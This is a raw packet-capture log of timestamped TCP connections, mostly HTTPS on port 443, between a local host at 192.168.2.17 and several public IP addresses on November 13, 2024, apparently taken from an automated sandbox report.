                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.246088982 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.246088982 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.246119022 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.246140003 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.246167898 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.297542095 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.495785952 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.495877981 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.496073008 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.496613026 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.496625900 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.499062061 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.499155998 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.499253035 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.499511003 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.499546051 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.662496090 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.845415115 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.929316044 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.929625034 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.929667950 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.930020094 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.930352926 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.930424929 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.930500031 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.971329927 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:29.171628952 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:29.171710014 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:29.171778917 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:29.172450066 CET49982443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:29.172466993 CET443499823.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:31.003057957 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:31.003125906 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:31.003218889 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:31.003462076 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:31.003482103 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.120701075 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.121068954 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.121092081 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.121414900 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.122008085 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.122008085 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.122029066 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.122061014 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.122095108 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.162390947 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.376339912 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.376420975 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.376476049 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.376964092 CET49986443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.376991987 CET4434998654.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.380064011 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.380101919 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.380279064 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.380527973 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.380544901 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.460072994 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.460387945 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.460407019 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.460705042 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.460987091 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.461039066 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.461138964 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.503334999 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.701966047 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.702063084 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.702140093 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.702913046 CET49988443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:33.702931881 CET443499883.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:37.268363953 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:38.985552073 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:38.985593081 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:38.985694885 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:38.986145973 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:38.986164093 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.887660027 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.887821913 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.889755011 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.889774084 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.890002966 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.891444921 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:39.935336113 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189589977 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189611912 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189656973 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189723969 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189749956 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189764977 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.189805984 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.191961050 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.191998959 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192030907 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192043066 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192055941 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192070007 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192095995 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192524910 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192545891 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192584991 CET49994443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:40.192591906 CET4434999452.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:46.078779936 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:46.078882933 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:46.079019070 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:46.079293013 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:46.079318047 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.187686920 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.188050032 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.188087940 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.188535929 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.188853979 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.188920021 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.189028978 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.189078093 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.189110041 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.436120987 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.436194897 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.436252117 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.436796904 CET49999443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.436815977 CET4434999954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.440046072 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.440087080 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.440181971 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.440541029 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:48.440555096 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.597757101 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.598156929 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.598186970 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.598534107 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.598938942 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.599004030 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.599148989 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.639337063 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.847948074 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.848030090 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.848201036 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.848742962 CET50002443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:49.848763943 CET443500023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:59.621696949 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:59.621737957 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:59.621822119 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:59.622061968 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:59.622075081 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.678263903 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.679049015 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.679069042 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.680026054 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.680031061 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.680073023 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.680079937 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.882513046 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.882554054 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.882666111 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.986988068 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:00.987020016 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057343960 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057373047 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057466984 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057555914 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057555914 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057583094 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.057984114 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.058005095 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.058015108 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.058171988 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.058218002 CET4435000840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.058603048 CET50008443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.188399076 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.188462973 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.191438913 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.193245888 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.193278074 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.236267090 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.236304998 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.236521959 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.236830950 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.236851931 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.726857901 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.726937056 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.731152058 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.731163979 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.731468916 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.770488977 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.815330029 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.896778107 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.898448944 CET4435000913.107.5.88192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.898540020 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.900995016 CET50009443192.168.2.1713.107.5.88
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.069767952 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.069870949 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.077905893 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.077922106 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.078181982 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.078243971 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.080385923 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.080425978 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.080435038 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.080862999 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.080899954 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.081372023 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.081772089 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.081856012 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.134135962 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378036976 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378074884 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378118038 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378171921 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378195047 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378231049 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378428936 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378489017 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378518105 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.378563881 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.381176949 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.381201982 CET443500102.23.209.157192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.381223917 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:02.381246090 CET50010443192.168.2.172.23.209.157
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:12.078995943 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:12.079169035 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:12.079243898 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:12.705682993 CET50011443192.168.2.17216.58.206.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:12.705723047 CET44350011216.58.206.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.243155956 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.243196964 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.243289948 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.243519068 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.243536949 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.313828945 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.314265966 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.314284086 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.314768076 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.315179110 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.315257072 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.315381050 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.315449953 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.315470934 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.598623037 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.598714113 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.598779917 CET50016443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.599425077 CET50016443192.168.2.1734.251.101.162
